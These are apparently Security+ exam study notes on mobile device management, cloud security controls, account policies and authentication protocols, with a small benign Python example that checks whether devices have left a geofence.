Mobile Device Management (MDM) review: any software that allows IT to ADMINISTER, automate, control and secure administrative policies on smartphones, laptops, tablets, or any other device connected to an organization's network. MDM is usually implemented with a third-party product that has management features for particular vendors of mobile devices. MDM manages company-owned data and end-user devices: - centralized management of the mobile devices (specialized functionality) - set policies on apps, data, camera, etc. - control the remote device: the entire device or a "partition" (container) - BYOD: bring your own device - you can also specify the type of security / manage access control
Application management: uses allow lists (whitelists) to control which applications may be installed on the mobile device. - Since not all applications are secure (some are malicious) an allow list is a good idea - the list of approved applications is managed through the MDM; a block list of known-bad apps is the weaker alternative
Content management: stores business data in a secure area of the device in encrypted form to protect it against attacks, and prevents confidential or business data from being shared with external users. - Mobile Content Management (MCM) lets us secure access to the data and protect it from outsiders - policies can depend on where the content is stored: file sharing and viewing (on-site content: Microsoft SharePoint, file servers) or cloud-based storage (Box, Office 365) - data sent from the mobile device (Data Loss Prevention prevents copy / paste of sensitive data) - ensures data is encrypted on the mobile device
Remote wipe: when a mobile device has been lost or stolen it can be remotely wiped; the device reverts to its factory settings and the data is no longer available. - wipe options allow removing business data only (selective wipe, used for BYOD) - managed from the MDM: clicking a button wipes all of the data on that device regardless of where it is (the device must still be reachable, so full-device encryption is the backstop if it never comes online again)
Geolocation: uses GPS (plus Wi-Fi and cell-tower data) to give the actual location of a mobile device; very useful if you lose or drop a device. - precise tracking (within feet) - can be used for good or bad (finding your phone, or finding you). For the exam: remember that geo-tracking will tell you the location of a stolen device
Geofencing: uses the Global Positioning System (GPS) or RFID to define geographical boundaries. Once the device is taken past the defined boundary, the security team is alerted (and the device can be locked or wiped). For the exam remember: geofencing prevents, or at least detects, mobile devices being removed from the company's premises. Extra: a virtual perimeter created by GPS or RFID; the service triggers an action when a device enters or leaves a set location. Coupons, notifications, engagement features, security alerts: businesses find creative uses for these virtual boundaries.
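The check an MDM runs on each location report to decide whether a device has left the fence, as an added Python example (not from the original notes). The fence is a circle around a site centre, distance is the great-circle (haversine) distance; the campus coordinates, radius and device readings are constructed.

```python
import math

EARTH_RADIUS_M = 6_371_000.0


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres between two WGS-84 points."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlmb = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlmb / 2) ** 2
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def inside_fence(lat, lon, fence):
    """fence = (center_lat, center_lon, radius_m). Phone GPS is accurate to a few
    metres, so keep the radius comfortably larger than the site itself to avoid
    alert noise at the boundary."""
    clat, clon, radius = fence
    return haversine_m(lat, lon, clat, clon) <= radius


def geofence_alerts(readings, fence):
    """readings: list of (device_id, lat, lon) as reported by the MDM agent.
    Returns the devices outside the fence with their distance past the edge
    in metres, which is what the MDM raises an alert (or a lock) on."""
    alerts = []
    clat, clon, radius = fence
    for dev, lat, lon in readings:
        d = haversine_m(lat, lon, clat, clon)
        if d > radius:
            alerts.append((dev, round(d - radius)))
    return alerts


if __name__ == "__main__":
    CAMPUS = (37.4220, -122.0841, 500.0)       # constructed site centre, 500 m radius
    reports = [("tab-01", 37.4225, -122.0845),   # constructed: still on site
               ("tab-02", 37.4300, -122.1000)]   # constructed: driven off site
    print(geofence_alerts(reports, CAMPUS))
```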
Screen locks: activated once the mobile device has not been used for a period of time. After it is locked, the user gets a fixed number of attempts to correctly enter the PIN before the device is disabled or wiped. - Allows mobile devices to be locked and the timeout to be enforced by MDM.
Push notifications: messages that appear on your screen even when the device is locked. They are pushed to the device without intervention from the end user and may include sensitive information. Some MDM platforms provide policy-based control of whether app notifications (and their content) can appear on the lock screen.
Passwords and PINs: some mobile devices, such as smartphones, are very easy to steal and conceal in a pocket. Strong passwords, or PINs of six or more characters, must be enforced. MDM also allows the device to be disabled or wiped after X failed attempts.
Biometrics (fingerprint, face) can be made mandatory via MDM for access to the mobile device.
Context-aware Authentication: the use of situational information (such as identity, geolocation, time of day or type of endpoint device) to improve access decisions. It requires knowing who the user is, what the user is requesting, how the user is connected, when the user is requesting the information and where the user is located. Ex: what time of day is it? The goal is to prevent unauthorized end users or insecure computing devices from accessing corporate data. ----- Such an approach might allow an end user to browse the network from inside the office, for example, but deny access if the same user tries to connect over public Wi-Fi.
Containerization of data on devices (MDM): the process of segregating / segmenting personal and corporate data on personal devices by creating a logical, encrypted container for corporate apps and data, enhancing corporate data security - segments the storage within the device itself, so a selective wipe can remove just the container
Storage Segmentation: segments the storage memory within the mobile device itself. Data in one storage segment cannot read or retrieve data from another storage segment.
Full device encryption (for MDM): the process of encoding all user data on a mobile device using an encryption key (typically derived from the user's passcode and a hardware-bound key). Once a device is encrypted, all user-created data is automatically encrypted before being committed to disk and all reads automatically decrypt the data before returning it to the calling process. - Allows your device to be fully encrypted, and MDM can require it - seen on Apple iOS and Android phones
MicroSD HSM (aka MicroSD Hardware Security Module). HSM definition: a hardware security module is a physical computing device that safeguards and manages digital keys and performs encryption and decryption for digital signatures, strong authentication and other cryptographic functions. ------- A MicroSD HSM is a physical device that provides cryptographic features for your computer or mobile device in a smaller, removable form factor. It ties the cryptographic functions (encryption, key generation, digital signatures, authentication) to a small piece of hardware. - Stores cryptographic keys and performs the operations on the card, so the private key never leaves the module; can do network authentication and end-to-end secure encryption.
MDM / Unified Endpoint Management (UEM): UEM combines MDM and endpoint protection software into 1 unified software / console. Generally provides management of the hardware, such as desktops, tablets, smartphones and IoT devices, ensuring they are secure and compliant. It can manage the security and applications running on the devices and can identify and block devices that have been jailbroken (iOS) or rooted (Android). - Multi-platform support is a key characteristic. Ex: Microsoft Intune
(MAM) Mobile Application Management: software that secures and enables IT control over enterprise applications on end users' corporate and personal devices. - manages the applications and their data (not the whole device), which suits BYOD. Ex: Microsoft Intune
SEAndroid (Security Enhancements for Android, SE for Android): prevents apps or processes from accessing data and resources they are not allowed to. SEAndroid was built on SELinux. SE for Android provides Mandatory Access Control (MAC) on top of the traditional Discretionary Access Control (DAC) environment, so even a process running as root is confined by policy. SE for Android can grant special privileges based on specific EMM policies. Because SE for Android controls access to kernel resources, certain apps written for a DAC-only environment may not run as intended. Key notes to know: - built on SELinux - implements MAC (Mandatory Access Control) in the Android OS, which limits "privilege escalation"
Third-party application stores (Enforcement & Monitoring of): there is a danger in downloading apps from third-party app stores as there is no guarantee of the security of the app being installed. This poses a security risk, as the vetting process for mobile apps in third-party stores may be less rigorous than in the official app stores; MDM can block installs from unknown sources.
Rooting / jailbreaking: gives you root access (full control) over the phone. Custom firmware downloads are used to root an Android mobile device. This gives the user a higher level of permissions on that device and removes some elements of vendor security (app sandboxing, signed updates). - Jailbreaking is the Apple iOS equivalent of rooting on Android: it allows you to run unauthorized software and removes device security restrictions. You can still access the Apple App Store even though jailbreaking has been carried out. - For the exam: rooting and jailbreaking remove the vendor restrictions on a mobile device to allow unsupported software to be installed.
Sideloading: installing an application package (.apk format on Android) directly on a mobile device, bypassing the app store; requires allowing installs from "unknown" sources. Useful for developers to test third-party apps, but it also allows UNAUTHORIZED software to be run on a mobile device.
Custom firmware: custom firmware downloads are used so that you can root your mobile device. Gives the end user a higher level of permissions on that device and removes some elements of vendor security. - The firmware image itself may unknowingly contain malware or a rootkit, so you must be very careful.
Carrier Unlocking: when a mobile device is no longer tied to the original carrier. This allows you to use your device with any provider, and it is sometimes done alongside installing third-party apps or firmware. - May not be an issue, but it is suggested you monitor these devices.
Firmware over-the-air (OTA) updates: firmware is software installed on a small memory chip on a hardware device and is used to control the hardware running on the device. Firmware OTA updates are pushed out periodically by the vendor, keeping the mobile device secure. One example is when the mobile device vendor sends a notification that there is a software update. - Most likely fine; recommended you monitor, and MDM can enforce a minimum OS version.
Camera use: smartphone cameras pose a security risk to companies, as trade secrets could be photographed very easily. Research and development departments often ban the use of personal smartphones in the workplace. - On test: MDM policies can disable cameras on company-owned smartphones, and can also disable screen capture. - Prevents theft of intellectual property.
SMS / Multimedia Messaging Service (MMS) / Rich Communication Services (RCS). SMS: text messaging, a common method of communication; two people in a room can communicate without others in the room knowing. Text messages can be used to launch an attack (smishing, malicious links). MMS: a way to send pictures and other attachments, similar to sending SMS messages. RCS: the carrier-based successor to SMS (used in Google Messages on Android) that adds read receipts, typing indicators, group chats and higher-quality pictures and videos. - Image and attachment capability makes MMS and RCS paths for data theft, so MDM may restrict them.
External media: SD cards or other external storage media may enable unauthorized transfer of corporate data; MDM can block or encrypt external storage.
USB On-The-Go (USB OTG): allows a smartphone or tablet to act as the USB host for other USB devices (flash drives, keyboards). Attaching USB storage can pose security problems as it makes it easy to copy information off the device. - Also allows a phone to be mounted as a USB stick on a computer, which gives the computer access to the phone's data. iOS has historically not supported USB OTG host mode.
Recording microphone: smartphones and tablets can record conversations with their built-in microphones. They could be used to take notes, but they could also be used to record conversations or the proceedings of a confidential meeting; MDM can disable the microphone in sensitive areas.
GPS tagging (geotagging): when you take a photograph, GPS tagging adds the location where it was taken to the image's metadata (EXIF). Most modern smartphones do this by default; you may want to turn this feature off for work, since a published photo would reveal the location of a site or of staff.
WiFi Direct / Ad hoc: a Wi-Fi Direct wireless network allows two Wi-Fi devices to connect to each other without requiring a WAP. It is single-path (one device acts as the group owner) and is not meant for internet sharing. An ad hoc wireless network also lets wireless devices connect without a WAP, but it is multipath and can share an internet connection with someone else. - Both let users set up their own wireless connections that bypass the corporate network controls. - End users should NOT be allowed to use ad hoc networks!
Tethering: when a cellular-enabled smartphone is attached to a laptop or other device (by USB, Bluetooth or Wi-Fi hotspot) to provide it with internet access. If a user's laptop is connected to the company network and also tethers to the internet, the result is split tunneling: internet traffic bypasses the corporate firewall, which is a security risk if the device is compromised. - Mobile devices can often function as a Wi-Fi hotspot or tether over USB or Bluetooth.
Hotspot: Wi-Fi hotspots are internet access points that let you connect to a Wi-Fi network from your computer, smartphone or other device while away from home (a phone sharing its cellular connection is also a hotspot). - Always use WPA2 or WPA3 on a hotspot you run - use a strong security password / key - treat public hotspots as untrusted and use a VPN on them
Payment Methods: smartphones allow credit card details to be stored locally so the phone can make contactless payments using Near Field Communication (NFC). For BYOD this needs to be carefully monitored, as someone could leave the company with a company credit card on the phone and continue to use it. MDM can prevent the payment function by disabling this feature in the mobile device management policies. - verify that the smartphone is "secure" (locked, encrypted, not rooted) before allowing payments
BYOD (Deployment Models) Bring Your Own Device: an employee is encouraged to bring their own device so they can use it for work; cost-effective for the company and more convenient for the user. The company needs 2 policies to make it effective: an Acceptable Use Policy and an on/offboarding policy. Problems: - a burden for IT because of the many device types, platforms and OS versions - the end user owns the device and can put whatever they want on it - you have to use MDM or UEM software to secure these devices before adding them to your network; however, end users feel the company will track their location and violate their privacy - think: you are allowing company data to be stored on an end user's personal cellphone
(COPE) deployment model, Corporate-Owned Personally Enabled: the company purchases the device, such as a tablet, phone or laptop, and allows the employee to use it for personal use as well. Often a better solution for the company than BYOD from a management perspective, as IT can limit what applications run on the devices. It also frees the company to perform a full device wipe if the device is lost or stolen.
(CYOD) Choose Your Own Device: a new employee chooses from a list of approved devices. Avoids ownership problems because the company owns the tablets, phones and laptops and supports only a limited set of models, simplifying management compared to BYOD. When the employee leaves the company and is offboarded, the devices are taken back as they belong to the company (corporate-owned).
(AUP) for deployment of devices, Acceptable Use Policy: an AUP outlines what the employee can and cannot do with the device (which apps, sites and data are allowed) during the working day.
Onboarding Policy of a device: the device configuration requirements to access corporate data (minimum OS version, not rooted / jailbroken, screen lock and encryption enabled, MDM agent installed, etc.)
Offboarding Policy of a device: how corporate data will be wiped from the device (most MDM platforms support a selective wipe, removing only company data). - MDM solutions with MAM (mobile application management) functionality can manage corporate data on BYOD devices without touching personal data
Virtual desktop infrastructure (VDI): hosted desktop environments that provide great control and management automation; the data stays in the data center rather than on the endpoint. When a security incident occurs, the VDI instance can simply be isolated from the network for further investigation.
High Availability Across Zones: availability zones are unique physical locations within a region, each with independent power, networking and cooling, and each comprised of one or more data centers. Deploying across two or more zones makes the service tolerant to data center failures through redundancy and isolation.
Resource policies: policies that state and define what access level a user (or service) has to a particular resource. Ensuring the principle of least privilege is followed is crucial for resource security and audit compliance. - A CSP will provide details on how its cloud platform can help organizations meet a variety of compliance standards.
Secrets management: CSPs offer a cloud service for centralized secure storage of, and access to, application secrets (for example AWS Secrets Manager or Azure Key Vault). This is usually a paid-for feature, billed per secret and per API call. It stores credentials in the cloud so they do not have to be hard-coded in source or config files. A secret is anything you want to control access to, such as API keys, passwords, certificates, tokens or cryptographic keys. The service typically offers programmatic access via API to support DevOps and continuous integration / continuous deployment (CI/CD), and can rotate secrets automatically. Access control applies at the vault-instance level and to the individual secrets stored within.
Integration and Auditing: integration is the process of how data is handled from input to output. - Integrate security across multiple platforms (different OSes and apps). Auditing: - validate the security controls - verify compliance with the requirements for financial and user data - create reports showing compliance with laws and regulations. A cloud auditor is responsible for ensuring that the policies, processes and security controls defined have actually been implemented (the auditor is a third party from outside the company). They test to verify that the processes, security controls and system integration are working as expected. Some of these controls include: - encryption levels - access control lists - privileged account use - password policies - anti-phishing protection - data loss prevention controls
Cloud storage: what has to be configured on storage containers (buckets). Permissions (who or what can access it): a significant concern for cloud storage. Customers have a storage identity and are placed into storage groups that have appropriate rights, restricting access at a tenant / subscription level. - One permission mistake (e.g., a bucket left publicly readable) can cause a data breach - Ex: Uber, Accenture, US Department of Defense. Encryption: with cloud storage, encryption at the service level is generally in place by default, with configurable encryption (provider-managed or customer-managed keys) within the storage service. For relational databases (SQL), Transparent Data Encryption (TDE) is common. Encryption for data in transit uses TLS/SSL. Replication: a method in which data is copied from one location to another immediately to ensure recovery in case of an outage. In the cloud, multiple copies of your data are always held for redundancy. - There are locally redundant, zone redundant and geo-redundant options. - Disaster recovery, high availability (plan for problems). High availability: ensures that copies of your data are held in different locations; automatic failover between a region pair in the event of an outage is common.
Cloud Networks Use of cloud-based services to deploy a corporate network that connects an organization's employees, resources and applications. It involves hosting or using all or some of the network resources like: VDI, Switches, Routes, Bandwith, Virtual Firewalls or types cloud like Public, Hybrid or Private
Virtual Networks may consist of: Virtual Private Clouds (VPC's) : A virtual network that consists of Cloud Resources, where the VMs for one company are isolated from the resources of another company. Separate VPCs can be isolated using public and private networks. ----------------------------- ------------------------------ The Cloud Contains Virtual Devices: - You can create instances of Servers, Databases, Storage Devices & Systems. - The Cloud also allows you to build a Virtual Infrastructure such as: Virtual Switches, Virtual Routers from within the Network of the Cloud Console. - This follows the same configuration as configuring a physical device-- just within a cloud - The Network Changes with the Rest of the Infrastrucuture --(it's on Demand and has Rapid Elasticity such as Elastic IP's.)
Specifications of Public and Private Subnets. Private Cloud: - contains all internal IP addresses (not for public services like websites); clients connect to the private cloud over a VPN and there is NO access from the Internet. A VPC may contain private subnets. Each of these subnets has its own CIDR IP address range and cannot connect directly to the Internet. They can be configured to go through a NAT gateway if outbound Internet connectivity is desired. Ex: a private subnet would use one of the following IP address ranges: 10.0.0.0, 172.16.x.x - 172.31.x.x, or 192.168.0.0. Public Cloud: - uses an external IP address so you can connect to the cloud from anywhere. Hybrid Cloud: - combines internal cloud resources with external ones. May combine BOTH public and private subnets.
Segmentation (Network): We use Virtual Private and Public Clouds (VPCs) to segment the application and the data so that they are isolated from each other. Virtualized security technologies to use on VPCs: - WAF (Web Application Firewall) - Next Generation Firewall (NGFW) - Intrusion Prevention System (IPS)
API Inspection and Integration: The cloud contains multiple APIs. We need to make sure that each one is integrated with the cloud so it works correctly. We also need to inspect APIs, as an attacker can pose as a legitimate user and send malicious requests. - For this reason it is suggested you use API monitoring to view specific API queries and calls and observe the ongoing communication.
Compute (Cloud Computing Security Controls): overview of the compute controls, each detailed on its own card below. - Security Groups: basically virtual firewalls that determine who or what can access the resources (such as access to the VPC); they let you control at Layer 3 or 4. - Dynamic resource allocation: allocates resources as needed; scalability and elasticity are key (rapid elasticity: automatically scaling resources up and down, pay for what you use). - Instance awareness: granular security controls that let you identify and manage very specific data flows and each instance of them, and define and set policies; VMs need to be monitored to prevent VM sprawl and unmanaged VMs. - Virtual Private Cloud Endpoint: a private connection between your VPC and another cloud service without crossing over the Internet; CSPs also offer site-to-site connectivity options for hybrid cloud; allows private access between the application instance and the data, lets you restrict data, and Internet connectivity is NOT required. - Container security: a more granular option for application and process isolation; containers run in a VM, most CSPs offer a hosted Kubernetes service that handles health monitoring and maintenance (Kubernetes has become the standard), and grouping container types on the same host limits the scope of the types of intrusions. - Compute cloud instances: the component that performs calculations for the cloud environment (cloud computing), e.g. Amazon Elastic Compute Cloud (EC2), Microsoft Azure Virtual Machines, Google Compute Engine (GCE).
Security Groups: basically virtual firewalls which determine who or what can access the resources (such as access to the VPC). They let you control at Layer 3 or 4, use CIDR block notation for IPv4 or IPv6, and create inbound rules for traffic on the network. - This allows us to define permissible network traffic.
Dynamic resource allocation: allocates resources as needed; resources are provisioned when they are needed, based on demand. Provisioning can be automatic, scaling up and down (aka rapid elasticity), which means you pay only for what is used. The cloud has elasticity, meaning it can expand and contract as needed.
Instance awareness: granular security controls for VM instances. - Allows you to identify and manage very specific data flows and each instance of them. Also allows you to define and set policies (Ex: allow or deny certain uploads to websites, deny spreadsheets or files containing credit card numbers). Also: VM instances need to be monitored to prevent VM sprawl and unmanaged VMs, which have security consequences but also add costs in the cloud. Tools like NIDS/NIPS can help detect new instances, and process controls like privileged identity management, change management and configuration management also help.
VPC Endpoint (Virtual Private Cloud Endpoint): allows you to create a private connection between your VPC and another cloud service without crossing over the Internet. CSPs offer site-to-site connectivity options for hybrid cloud. - Allows private access between the application instance and the data. It also allows you to restrict data. - Internet connectivity is NOT required.
Container security: containers offer a more granular option for application and process isolation. - Containers run in a VM (Virtual Machine). - Most CSPs offer a hosted Kubernetes service, which handles critical tasks like health monitoring and maintenance for you (Kubernetes has become the standard). - Group container types on the same host (this limits the scope of the types of intrusions).
Compute Cloud Instances: a component that performs calculations for the cloud environment (cloud computing) (not on the test). Examples: Amazon Elastic Compute Cloud (EC2), Microsoft Azure Virtual Machines, Google Compute Engine (GCE).
CASB Cloud Access Security Broker (CASB): 1. Software that sits in between the organization and the cloud service provider. It enforces the company's group policies on devices between on-premises and the cloud. Can also scan and detect (and optionally prevent) data access with unauthorized apps and data storage in unauthorized locations. 2. An on-premises or cloud-based security policy enforcement point that is placed between cloud service consumers and cloud service providers to combine and interject enterprise security policies as cloud-based resources are accessed. Think of the CASB as the sheriff that enforces the laws set by the cloud service administrators.
What can be used to ensure application security? Solutions such as: 1. Web Application Firewalls (WAF) 2. Next Gen Firewalls (NGFW) 3. IDP/IPS
(SWG) Next-generation Secure Web Gateway (SWG): secure web gateways work at the application level (layer 7), looking at the actual traffic over the protocol to detect malicious intent. Functions include web proxy, policy enforcement, malware detection, traffic inspection, Data Loss Protection, and URL filtering.
Firewall considerations in a cloud environment: One reason we need a good firewall is to filter the incoming traffic flow to protect our cloud-hosted infrastructure and applications from attackers or malware. For example, the most common cloud firewall is the Web Application Firewall (WAF). Cost: one of the reasons for WAF (Web Application Firewall) and virtual firewall popularity is that it meets a common need, is easy to configure, and is less expensive than more function-rich NGFW and SWG options. Need for segmentation: the firewall can filter traffic between virtual networks and the Internet, microservices, VMs, and VPCs. Network segmentation should be supported with appropriate traffic filtering/restriction, using the firewall type that is most appropriate for the use case. Open Systems Interconnection (OSI) layers: a network firewall works at Layer 3 (Network); stateful packet inspection happens at Layers 3 and 4 (Network / Transport). Many cloud firewalls, like Web Application Firewalls, work at Layer 7 (Application) of the OSI model.
OSI review mnemonic (from bottom to top of the OSI model): People Don't Need To See Polly Anna (Physical, Data Link, Network, Transport, Session, Presentation, Application).
Cloud Native Controls vs 3rd Party Solutions. Cloud Native Security Controls: platforms like Microsoft Azure and Amazon Web Services (AWS) have their own tools, such as Azure Resource Manager (ARM) and AWS CloudFormation. These tools make managing Microsoft and AWS cloud resources easier, supporting Infrastructure-as-Code. - Separate tools for separate platforms, separate skillsets. Pros: integrated and supported by the CSP, highly configurable, security is part of the infrastructure, usually no additional costs. Third Party Solutions: 3rd-party tools add more flexibility, functionality, and multi-platform support. Organizations will typically move to third-party solutions when the native cloud solutions do not meet their functionality needs. Example: some organizations move to Terraform for Infrastructure-as-Code (IaC) because it supports the major CSPs using a single language. - CSPs offer a marketplace where third parties can publish offers. Pros: support across multiple cloud providers, extends policies outside the scope of the CSP, more extensive reporting.
IdP Identity Provider (IdP): creates, maintains, and manages identity information while providing authentication services to applications. IdPs are basically services, websites, or software that store your identity. Ex: when you use SSO (Single Sign-On), you need a place to store your username/password identity; this is what OpenID or Kerberos does. Examples: Azure Active Directory is the identity provider for Office 365. Other examples include Active Directory, Okta, and Duo.
Attributes (of Identity): a unique property in a user's account details, such as employee ID, fingerprint, birthday, SSN, gender, thumbprint, etc.
Certificates (for Identity): a digital certificate, for which two keys are generated, a public key and a private key. The private key is used to prove identity. Ex: Amazon's website - when you go to their website, Amazon's certificate is viewable from the browser, verifying their identity.
Tokens (for Identification): a digital token, such as a SAML token used for federation services, or a token used by Open Authorization (OAuth2). Other examples: RSA tokens.
SSH Keys (for Identification): typically used by an administrator for secure authentication to a remote Linux server instead of a username and password. The public key is stored on the server, with the private key remaining on the administrator's desktop.
Smart Cards (for Identification): a credit-card-like physical token with a certificate embedded on a chip; it is used in conjunction with a PIN.
User Account (Account Types): a standard user account with limited privileges - cannot install software, has limited access to the computer systems. There are 2 types of user accounts: those that are LOCAL to the machine, and those that ACCESS a domain.
Shared and generic accounts/credentials: when a group of people performs the same duties, such as members of customer service, they can use a shared account. When user-level monitoring, auditing, or non-repudiation is required, you must eliminate the use of shared accounts. - Most cloud IdPs have options to eliminate the need for shared accounts.
Service accounts (aka "Principal Account"): a service account is a type of administrator account used to run an application. - Access can be defined for a specific service. - Used exclusively by services running on a computer. Ex: an account to run an anti-virus application. When software is installed on a computer or server, it may require PRIVILEGED access to run; a lower-level administrative account is appropriate, and the service account fits the bill.
Guest accounts: access to a computer for guests - no access to change settings, modify applications, view other users' files, etc.; usually has no password. Defined: a legacy account that was designed to give limited access to a single computer without the need to create a user account. Normally disabled, as it is no longer used, and some administrators see it as a security risk. Windows 10 build 10159 REMOVED the "Guest Account" feature because it presented many security risks.
Password complexity (Account Policies): complex passwords (sometimes known as strong passwords) are formed by choosing characters from at least three of the following four groups: lowercase (a, b, c), uppercase (A, B, C), numbers (1, 2, 3), special characters ($, @). - Password complexity should be enabled so that users don't have weak passwords. - Make your password strong (resists brute-force attacks). - Increase password entropy. - No single words, no obvious passwords. - Mix upper and lower case and use special characters. - Prevent password reuse.
Password History: prevents the end user from reusing the same password. For example, if the number of passwords remembered is 12, only on the 13th change could a password be reused.
Password Reuse: a term used in the exam that means the same as password history; both prevent someone from reusing the same password. Account policies: for the Security+ exam, password reuse and password history are the same thing.
Network Locations as a security measure: - Location-based policy. - Identify devices based on IP subnets or IP addresses. - Can be difficult to enforce with mobile devices. May include these subsets under Network Locations: Geofencing, Geotagging, Geolocation.
Geofencing (Account Policies): can be used to establish a region and pinpoint whether you are in that region. If you are not, you will not be able to log in. - Mostly on mobile devices. - Part of location-based authentication: can be added as an additional factor in authentication.
Geolocation (Account Policies): can track an end user's location by IP address and ISP. - Can use GPS; mobile devices are very accurate with location tracking. - May use the 802.11 wireless network someone is connected to, which is less accurate. - May use the IP address the end user is connecting from (this is not very accurate for tracking).
Geotagging: the process of adding geographical identification metadata to various media, such as a geotagged photograph or video, websites, SMS messages, QR codes or RSS feeds; it is a form of geospatial metadata. This data usually consists of latitude and longitude coordinates, though it can also include altitude, bearing, distance, accuracy data, place names, and perhaps a time stamp. The geographical location data used in geotagging can, in almost every case, be derived from the Global Positioning System, based on a latitude/longitude coordinate system that represents each location on the earth. - Adds location information / metadata to a document or file the end user is storing. - Latitude and longitude, distance, time stamps. - Location-based policy: these can all be combined.
Time-Based Logins: establishes a time range for when end users can access a company's network. It can be used to prevent access to the network, e.g. after the user's shift. It ensures that the user uses the resources only during working hours.
Access Policies: policies as to what resources employees can access. - Control access to the account.
Account Permissions: what permissions the account has rights to. - Also granting permissions, Ex: giving permission to a folder.
Account Audits: an auditor will review accounts periodically to ensure that old accounts are not being used after an employee changes departments or leaves the company. The auditor will also ensure that all employees have only the necessary permissions and privileges to carry out their jobs. - Principle of Least Privilege.
Risky login / Impossible travel time. Risky login: a security feature used by cloud providers, leveraging a record of the devices used by each user. The response will vary by provider but may include a confirmation email to validate identity or responding to a prompt in an authenticator app. - How user and sign-in risk are used varies by provider. Impossible travel time: a security feature used by cloud providers such as Microsoft with their Office 365 package to prevent fraud. If a person is in Houston and then 15 minutes later is determined to be in New York, their attempt to log in will be blocked.
Lockout: Account Lockout Policy in AD - this can be set up to: - Lock out the end user for a certain period of time. - Disable the account until someone else (an admin) comes along and enables it for the end user.
Disablement: account management (the identity lifecycle) ranges from account creation at onboarding to its DISABLEMENT when a user leaves the company.
Password Keys: a physical hardware device that looks like a USB device (and plugs into USB) and works in conjunction with your password to provide multi-factor authentication (MFA). - Helps prevent unauthorized logins and account takeovers (the password key must be present to log in). - Doesn't replace other authentication factors (passwords are still important). - Example: YubiKey, which is FIPS 140-2 validated and provides code storage within a tamper-proof container.
Password Vaults: a password manager that allows you to store your passwords in one central place. The password manager encrypts all credentials stored, and also offers cloud-based synchronization options; passwords are stored locally on the device. - Stores passwords so the user does not need to remember them. - Uses strong encryption (e.g. AES-256) for secure storage. - This is only as secure as the owner password used to protect the vault itself. Ex: iCloud "Keychain" on MacBooks (free), LastPass, 1Password, Dashlane, NordPass, Bitwarden, Keeper, RoboForm, etc.
TPM Trusted Platform Module (TPM): a computer chip (microcontroller), normally built into the motherboard of a computer, that is used for Full Disk Encryption (FDE). - Designed to secure hardware with integrated cryptographic keys. - Also considered a cryptographic processor. - Persistent memory (comes with unique keys burned in during production). - Versatile memory: holds storage keys, hardware configuration information, etc. - Password protected (no dictionary attacks).
HSM Hardware Security Module (HSM): hardware that uses high-end cryptography. Used to store encryption keys; a key escrow that holds the private keys for third parties. - Usually a server that contains specialized hardware that allows fast cryptography. - Can be used as centralized storage for all cryptographic keys. - Needs redundancy (such as multiple HSMs).
Knowledge-based Authentication (KBA): during the authentication process, the end user is asked very specific knowledge questions that only they know. This is normally used by banks, financial institutions, or email providers to identify someone when they want a password reset. There are two different types of KBA, 1. Dynamic and 2. Static, and they have their strengths and weaknesses. Static KBA: questions that are common to the user. For example, "What is the name of your first school?" Dynamic KBA: deemed to be more secure because the questions are not provided beforehand. For example: 1. What was the "street number" when you lived in Florida? (gives you a limited time to answer) 2. To confirm identity, a bank may ask the customer to name 3 direct debit mandates, the date, and the amount paid.
EAP Extensible Authentication Protocol (EAP): an authentication framework frequently used in network and Internet connections. - Allows new authentication technologies to be compatible with existing wireless or point-to-point connection technologies. - Provides the transport and usage of keying material and parameters generated by EAP methods.
CHAP Challenge-Handshake Authentication Protocol (CHAP): an authentication protocol that validates users by sending an encrypted challenge over the network. - Consists of a 3-way handshake. - After a link is established, the server sends the client a "challenge message". - The client responds with the password hash. - The server compares the received hash with the stored hash to confirm (it finishes). - This "challenge-response" is ongoing; the process continues periodically while the session is active (while on the webpage). The end user never sees that this is happening. Other definition: an identity-checking protocol that periodically re-authenticates the user during an online session. Properly implemented, CHAP is replay-attack resistant and far more secure than the Password Authentication Protocol (PAP).
PAP Password Authentication Protocol (PAP): a password-based authentication protocol used by the Point-to-Point Protocol (PPP) to validate users. Supported by almost all network OS remote access servers, but considered weak.
802.1X: a network authentication protocol that opens ports for network access when an organization authenticates a user's identity and authorizes them for access to the network; an authentication mechanism for devices wishing to attach to a LAN or WLAN. Defines the encapsulation of the EAP protocol. - Involves 3 parties: a supplicant, an authenticator, and an authentication server (supplicant = client).
RADIUS Remote Authentication Dial-In User Service (RADIUS): a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for users who connect to and use a network service. - RADIUS is a client/server protocol that runs in the application layer, can use TCP or UDP, and encrypts the password only. - RADIUS supports a wide variety of platforms and devices. - Not just for dial-in anymore. - Centralizes authentication for users (routers, switches, firewalls, server authentication, remote VPN access). - 802.1X network access. - Available on ANY server operating system.
TACACS+ Terminal Access Controller Access-Control System Plus (TACACS+): an alternative to RADIUS, developed by Cisco. Definition: a family of related protocols handling remote AUTHENTICATION and related services for NETWORK ACCESS CONTROL through a centralized server. Uses TCP port 49. - The latest version is TACACS+; however, it is NOT BACKWARDS compatible with previous versions of TACACS, and this version is considered a separate protocol.
Kerberos (Review): a network authentication protocol that works on the basis of cryptographic tickets to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner (both the user and the server verify each other's identity). - Authenticate once, trusted by the system. - No need to re-authenticate to everything; re-authenticates throughout the day automatically. - Provides mutual authentication, meaning the client is not only authenticating to the server, but the server also has to authenticate to us. - Protects against on-path and replay attacks. - Developed at MIT in the 1980s. - Integrated in Microsoft Windows 2000, based on the Kerberos 5.0 open standard, and compatible with other operating systems. - Is the authentication protocol in Microsoft's Active Directory (and is preferred over NTLM). - Runs as a third-party trusted server known as the Key Distribution Center (KDC), which includes an authentication server, a ticket granting service, and a database of secret keys for users and services. 2. An authentication protocol used by Windows to provide two-way (mutual) authentication using a system of tickets. Uses port 88.
SSO Single Sign-On (SSO): an authentication method that enables users to securely authenticate with multiple applications and websites by using just one set of credentials. Single Sign-On means a user doesn't have to sign into every application they use: the user logs in once and that credential is used for multiple apps. Single sign-on based authentication systems are often called "modern authentication".
